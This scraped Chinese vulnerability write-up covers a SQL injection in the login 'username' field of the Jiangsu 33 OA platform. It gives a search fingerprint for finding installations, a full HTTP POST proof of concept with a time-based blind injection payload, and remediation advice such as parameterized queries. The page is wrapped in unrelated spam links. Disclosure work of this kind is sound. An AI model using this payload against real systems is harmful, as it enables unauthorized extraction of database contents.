当前位置: 首页 > news >正文

crm网站推荐wordpress 读书主题

crm网站推荐,wordpress 读书主题,邢台网站优化建设,wordpress给后台添加样式0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁…

0x01 漏洞介绍


江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。


0x02 影响版本

  1. 江苏叁拾叁-OA

0x03 语法特征

  1. app="江苏叁拾叁-OA"

0x04 漏洞复现


页面
 


POC(payload sqlmap梭哈来的)

POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin' AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND 'AUxO'='AUxO&password=admin


直接sqlmap梭哈来
 


0x05 漏洞修复建议

  1. 使用参数化查询
  2. 对用户输入进行验证和过滤
  3. 限制数据库账户权限
  4. 更新和打补丁
http://www.yayakq.cn/news/811341/

相关文章:

  • 做网站开发用什么APP好即墨公司做网站
  • 长春 房地产网站建设公司开个网站多少钱
  • 苏州高端网站建设合肥seo网站多少钱
  • 有必要自建网站做导购吗苏州吴江区住房和城乡建设局网站
  • 做网站做推广有效果吗百度怎么推广自己的信息
  • 梅州新农村建设网站优秀企业门户网站
  • 制作百度移动网站模板免费下载东营住房与城乡建设部网站
  • 杭州知名的网站建设策划免费高清视频下载
  • 苏宁易购网站上的营销页面wordpress怎么发文章到别的页面
  • 会展网站模板seo分析师
  • 网站怎么添加横幅wordpress 多用户博客
  • 什么是理财北京网站建设公司做配资网站多少钱
  • 建站公司最新排名做动态图网站
  • 技术支持 湘潭网站建设做网站专家
  • 如何做网站网页费用楼市最新消息2023年房价走势
  • 如何做网站推广下拉刘贺稳14浙江省建设门户网站
  • 网站开发培训学校网站江苏省建设执业中心网站
  • 电商网站的图片免费刷赞网站推广qq免费
  • 网站建设规划与管理 试卷深圳分销网站设计哪家好
  • 小说投稿赚钱的网站网站的排版
  • 旅游网站怎么制作好的手机端网站模板下载软件
  • 网站顶部导航一个网站如何优化
  • 新西兰网站后缀中国正国级名单
  • mysql数据库建设网站wordpress网站样式
  • 制作网站要钱吗济源市建设工程管理处网站
  • 锦州网站建设锦州宜宾网站建设网站
  • 网站设计策划书3000字如何自己编写小程序
  • wordpress没有找到站点做网站技术服务合同
  • 百度网盟推广的 合作网站搭建网站 网页
  • 手机网站开发计划前端素材网站